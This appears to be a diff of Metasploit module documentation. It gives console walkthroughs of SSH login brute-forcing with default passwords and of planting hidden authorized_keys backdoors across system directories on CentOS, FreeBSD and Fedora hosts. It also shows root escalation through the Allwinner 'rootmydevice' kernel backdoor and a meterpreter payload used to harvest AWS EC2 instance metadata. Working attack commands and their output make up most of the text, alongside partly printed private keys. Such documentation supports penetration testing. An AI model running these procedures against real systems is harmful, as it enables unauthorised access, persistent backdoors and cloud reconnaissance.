-    [*] Command shell session 2 opened (192.168.2.229:34721 -> 192.168.4.62:22) at 2016-06-19 15:49:34 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-### CentOS 6 (root)
-The following sshd_config changes were made:
-
-    PubkeyAuthentication yes
-    AuthorizedKeysFile	.sshsecret/.authorized_keys
-    PermitRootLogin yes
-
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password pass
-    password => pass
-    msf auxiliary(ssh_login) > set rhosts 192.168.4.62
-    rhosts => 192.168.4.62
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'root:pass' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:46420 -> 192.168.4.62:22) at 2016-06-19 15:58:32 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key.  Keep in mind NOT setting a user (targeted), and CreateSSHFolder will possibly make MANY folders/files as can be observed below.
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set CreateSSHFolder true
-    CreateSSHFolder => true
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .sshsecret/.authorized_keys
-    [*] Finding .sshsecret directories
-    [*] Attempting to create ssh folders that don't exist
-    [*] Creating //.sshsecret folder
-    [*] Creating /bin/.sshsecret folder
-    [*] Creating /dev/.sshsecret folder
-    [*] Creating /etc/abrt/.sshsecret folder
-    [*] Creating /etc/ntp/.sshsecret folder
-    [*] Creating /proc/.sshsecret folder
-    [*] Creating /root/.sshsecret folder
-    [*] Creating /sbin/.sshsecret folder
-    [*] Creating /usr/games/.sshsecret folder
-    [*] Creating /var/adm/.sshsecret folder
-    [*] Creating /var/cache/rpcbind/.sshsecret folder
-    [*] Creating /var/empty/saslauth/.sshsecret folder
-    [*] Creating /var/empty/sshd/.sshsecret folder
-    [*] Creating /var/ftp/.sshsecret folder
-    [*] Creating /var/gopher/.sshsecret folder
-    [*] Creating /var/lib/avahi-autoipd/.sshsecret folder
-    [*] Creating /var/lib/gdm/.sshsecret folder
-    [*] Creating /var/lib/hsqldb/.sshsecret folder
-    [*] Creating /var/lib/mysql/.sshsecret folder
-    [*] Creating /var/lib/nfs/.sshsecret folder
-    [*] Creating /var/run/avahi-daemon/.sshsecret folder
-    [*] Creating /var/run/pulse/.sshsecret folder
-    [*] Creating /var/spool/lpd/.sshsecret folder
-    [*] Creating /var/spool/mail/.sshsecret folder
-    [*] Creating /var/spool/postfix/.sshsecret folder
-    [*] Creating /var/spool/uucp/.sshsecret folder
-    [*] Creating /var/www/.sshsecret folder
-    [+] Storing new private key as /root/.msf4/loot/20160619155920_default_192.168.4.62_id_rsa_271813.txt
-    [*] Creating //.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Creating /bin/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /dev/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /etc/abrt/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /etc/ntp/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Adding key to /home/user/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 761 bytes in 1 chunks of 2910 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /root/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /sbin/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /usr/games/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/adm/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/cache/rpcbind/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/empty/saslauth/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/empty/sshd/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/ftp/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/gopher/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/avahi-autoipd/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/gdm/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/hsqldb/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/mysql/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/lib/nfs/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/run/avahi-daemon/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/run/pulse/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/lpd/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/mail/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/postfix/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/spool/uucp/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Creating /var/www/.sshsecret/.authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
-    [+] Key Added
-    [*] Post module execution completed
-
-
-### FreeBSD9 (root)
-
-Several sshd_config mods were needed to allow root login, and enable the service to run correctly.
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.2.130
-    rhosts => 192.168.2.130
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'root:password' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64 '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:41724 -> 192.168.2.130:22) at 2016-06-19 22:10:59 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set username root
-    username => root
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Finding .ssh directories
-    [+] Storing new private key as /root/.msf4/loot/20160619221108_default_192.168.2.130_id_rsa_441694.txt
-    [*] Creating /root/.ssh/authorized_keys
-    [*] Max line length is 131073
-    [*] Writing 380 bytes in 1 chunks of 1461 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.130
-    rhosts => 192.168.2.130
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username root
-    username => root
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.2.130:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 4 keys from /root/.msf4/loot
-    [+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
-    MIIEowIBAAKCAQEAqBC5XwkPOAtFn8zCFWIs3IIzUUfMvJPWxQQl1Porf8GiSs2B
-    ...snip...
-    6aj815iPJp9X5vnIR6mRdTJP9UQraPe6jneicx8QfncfoqJbA2v7
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64 '
-    [*] Command shell session 2 opened (192.168.2.229:32991 -> 192.168.2.130:22) at 2016-06-19 22:14:16 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-
-### Fedora 20 (root)
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.2.143
-    rhosts => 192.168.2.143
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:35460 -> 192.168.2.143:22) at 2016-06-19 20:27:53 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set user root
-    user => root
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added User SSH Path: /root/.ssh
-    [+] Storing new private key as /root/.msf4/loot/20160619202835_default_192.168.2.143_id_rsa_458964.txt
-    [*] Creating /root/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1456 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.143
-    rhosts => 192.168.2.143
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username root
-    username => root
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.2.143:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 2 keys from /root/.msf4/loot
-    [!] No active DB -- Credential data will not be saved!
-    [+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
-    MIIEowIBAAKCAQEAx5LLnAOPzc5KSI/Zd71bdHlexQrIpuASjUIGnJjlJVB9Sfyz
-    ...snip...
-    vtOaL6/NsfxFDDrCBX72X5tv3rTA4MNzOFTYbCM80Ln6E2TDWgPv
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
-    [*] Command shell session 2 opened (192.168.2.229:35751 -> 192.168.2.143:22) at 2016-06-19 20:31:23 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-
-### Fedora 20 (user level)
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username user
-    username => user
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.2.143
-    rhosts => 192.168.2.143
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'user:password' 'uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:37727 -> 192.168.2.143:22) at 2016-06-19 20:33:45 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set username user
-    username => user
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Finding .ssh directories
-    [+] Storing new private key as /root/.msf4/loot/20160619203401_default_192.168.2.143_id_rsa_010117.txt
-    [*] Creating /home/user/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1452 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
@@ -0,0 +1,93 @@
+  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+  Vulnerable OS: all OS images available for Orange Pis,
+				 any for FriendlyARM's NanoPi M1,
+				 SinoVoip's M2+ and M3,
+				 Cuebietech's Cubietruck +
+				 Linksprite's pcDuino8 Uno
+  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+
+This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
+
+## Usage
+
+To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
+
+- `use auxiliary/scanner/ssh/ssh_login`
+
+```
+msf auxiliary(ssh_login) > set username orangepi
+username => orangepi
+msf auxiliary(ssh_login) > set password orangepi
+password => orangepi
+msf auxiliary(ssh_login) > set rhosts 192.168.2.21
+rhosts => 192.168.2.21
+msf auxiliary(ssh_login) > exploit
+
+[*] 192.168.2.21:22 SSH - Starting bruteforce
+[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
+[!] No active DB -- Credential data will not be saved!
+[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+- `use post/multi/escalate/allwinner_backdoor`
+
+```
+msf post(allwinner_backdoor) > set verbose true
+verbose => true
+msf post(allwinner_backdoor) > set session 1
+session => 1
+msf post(allwinner_backdoor) > run
+```
+
+## Successful exploitation:
+
+```
+[+] Backdoor found, exploiting.
+[+] Privilege Escalation Successful
+[*] Post module execution completed
+msf post(allwinner_backdoor) > sessions -i 1
+[*] Starting interaction with 1...
+
+2013564244
+uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
+true
+RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
+TitlDmvnSvINczARsMAKdajpRoXEohXO
+0
+RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
+id
+uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
+^Z
+Background session 1? [y/N]  y
+```
+
+## Graceful exit on non-vulnerable devices:
+
+```
+msf > use auxiliary/scanner/ssh/ssh_login
+msf auxiliary(ssh_login) > set username pi
+username => pi
+msf auxiliary(ssh_login) > set password raspberry
+password => raspberry
+msf auxiliary(ssh_login) > set rhosts basementpi
+rhosts => basementpi
+msf auxiliary(ssh_login) > exploit
+
+[*] 192.168.2.80:22 SSH - Starting bruteforce
+[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
+[!] No active DB -- Credential data will not be saved!
+[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
+msf post(allwinner_backdoor) > set verbose true
+verbose => true
+msf post(allwinner_backdoor) > set session 1
+session => 1
+msf post(allwinner_backdoor) > run
+
+[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
+[*] Post module execution completed
+```
@@ -1,198 +0,0 @@
-## Vulnerable Application
-
-  This module uses an existing session on an AWS EC2 instance to gather
-  the metadata about the instance.  As such, any EC2 instance with `curl`
-  is an applicable target.
-
-## Verification Steps
-
-  1. Get session
-  2. Do `use post/multi/gather/aws_ec2_instance_metadata`
-  3. Do `set SESSION <session id>`
-  4. Do `run`
-  5. See loot.
-
-## Options
-
-  Set `VERBOSE` to `true` if you would like the AWS EC2 instance metadata to be shown
-  in addition to being stored.
-
-## Scenarios
-
-  Default, non-verbose mode:
-
-  ```
-  resource (msf.rc)> use exploit/multi/ssh/sshexec
-  resource (msf.rc)> set PASSWORD test
-  PASSWORD => test
-  resource (msf.rc)> set USERNAME test
-  USERNAME => test
-  resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
-  PAYLOAD => linux/x86/meterpreter/bind_tcp
-  resource (msf.rc)> set RHOST 192.168.2.2
-  RHOST => 192.168.2.2
-  resource (msf.rc)> run -j
-  [*] Exploit running as background job.
-  resource (msf.rc)> sleep 10
-  [*] Started bind handler
-  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-  [*] 192.168.2.2:22 - Sending stager...
-  [*] Command Stager progress -  42.09% done (306/727 bytes)
-  [*] Sending stage (1495599 bytes) to 192.168.2.2
-  [*] Command Stager progress - 100.00% done (727/727 bytes)
-  [*] Meterpreter session 1 opened (192.168.1.149:52075 -> 192.168.2.2:4444) at 2016-09-30 06:40:44 -0700
-
-  resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
-  resource (msf.rc)> set SESSION 1
-  SESSION => 1
-  resource (msf.rc)> run
-  [*] Gathering AWS EC2 instance metadata
-  [+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930064126_default_192.168.2.2_aws.ec2.instance_509214.txt
-  [*] Post module execution completed
-  ```
-
-  Non-default, verbose mode:
-
-  ```
-  resource (msf.rc)> use exploit/multi/ssh/sshexec
-  resource (msf.rc)> set PASSWORD test
-  PASSWORD => test
-  resource (msf.rc)> set USERNAME test
-  USERNAME => test
-  resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
-  PAYLOAD => linux/x86/meterpreter/bind_tcp
-  resource (msf.rc)> set RHOST 192.168.2.2
-  RHOST => 192.168.2.2
-  resource (msf.rc)> run -j
-  [*] Exploit running as background job.
-  resource (msf.rc)> sleep 10
-  [*] Started bind handler
-  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-  [*] 192.168.2.2:22 - Sending stager...
-  [*] Command Stager progress -  42.09% done (306/727 bytes)
-  [*] Sending stage (1495599 bytes) to 192.168.2.2
-  [*] Command Stager progress - 100.00% done (727/727 bytes)
-  [*] Meterpreter session 1 opened (192.168.1.149:52775 -> 192.168.2.2:4444) at 2016-09-30 06:55:54 -0700
-  resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
-  resource (msf.rc)> set SESSION 1
-  SESSION => 1
-  resource (msf.rc)> set VERBOSE true
-  VERBOSE => true
-  resource (msf.rc)> run
-  [*] Fetching http://169.254.169.254/latest/meta-data/
-  [*] Gathering AWS EC2 instance metadata
-  [*] Fetching http://169.254.169.254/latest/meta-data/ami-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/ami-launch-index
-  [*] Fetching http://169.254.169.254/latest/meta-data/ami-manifest-path
-  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/
-  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/ami
-  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/root
-  [*] Fetching http://169.254.169.254/latest/meta-data/hostname
-  [*] Fetching http://169.254.169.254/latest/meta-data/instance-action
-  [*] Fetching http://169.254.169.254/latest/meta-data/instance-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/instance-type
-  [*] Fetching http://169.254.169.254/latest/meta-data/local-hostname
-  [*] Fetching http://169.254.169.254/latest/meta-data/local-ipv4
-  [*] Fetching http://169.254.169.254/latest/meta-data/mac
-  [*] Fetching http://169.254.169.254/latest/meta-data/metrics/
-  [*] Fetching http://169.254.169.254/latest/meta-data/metrics/vhostmd
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/device-number
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/interface-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/192.168.2.2
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-hostname
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-ipv4s
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/mac
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/owner-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-hostname
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-ipv4s
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-group-ids
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-groups
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-ipv4-cidr-block
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-block
-  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-blocks
-  [*] Fetching http://169.254.169.254/latest/meta-data/placement/
-  [*] Fetching http://169.254.169.254/latest/meta-data/placement/availability-zone
-  [*] Fetching http://169.254.169.254/latest/meta-data/profile
-  [*] Fetching http://169.254.169.254/latest/meta-data/public-hostname
-  [*] Fetching http://169.254.169.254/latest/meta-data/public-ipv4
-  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/
-  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/
-  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
-  [*] Fetching http://169.254.169.254/latest/meta-data/reservation-id
-  [*] Fetching http://169.254.169.254/latest/meta-data/security-groups
-  [*] Fetching http://169.254.169.254/latest/meta-data/services/
-  [*] Fetching http://169.254.169.254/latest/meta-data/services/domain
-  [*] Fetching http://169.254.169.254/latest/meta-data/services/partition
-  [+] AWS EC2 instance metadata
-  {
-    "ami-id": "ami-2d39803a",
-    "ami-launch-index": "0",
-    "ami-manifest-path": "(unknown)",
-    "block-device-mapping": {
-      "ami": "/dev/sda1",
-      "root": "/dev/sda1"
-    },
-    "hostname": "ip-192.168.2.2.ec2.internal",
-    "instance-action": "none",
-    "instance-id": "i-16fffae",
-    "instance-type": "t2.medium",
-    "local-hostname": "ip-192.168.2.2.ec2.internal",
-    "local-ipv4": "192.168.2.2",
-    "mac": "aa:bb:cc:dd:ee:ff",
-    "metrics": {
-      "vhostmd": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
-    },
-    "network": {
-      "interfaces": {
-        "macs": {
-          "aa:bb:cc:dd:ee:ff": {
-            "device-number": "0",
-            "interface-id": "eni-1234ff",
-            "ipv4-associations": {
-              "192.168.2.2": "192.168.2.2"
-            },
-            "local-hostname": "ip-192.168.2.2.ec2.internal",
-            "local-ipv4s": "192.168.2.2",
-            "mac": "aa:bb:cc:dd:ee:ff",
-            "owner-id": "186638383",
-            "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
-            "public-ipv4s": "192.168.2.2",
-            "security-group-ids": "sg-123a7",
-            "security-groups": "launch-wizard-15",
-            "subnet-id": "subnet-123453d",
-            "subnet-ipv4-cidr-block": "192.0.2.0/24",
-            "vpc-id": "vpc-fffffff",
-            "vpc-ipv4-cidr-block": "192.0.0.0/16",
-            "vpc-ipv4-cidr-blocks": "192.0.0.0/16"
-          }
-        }
-      }
-    },
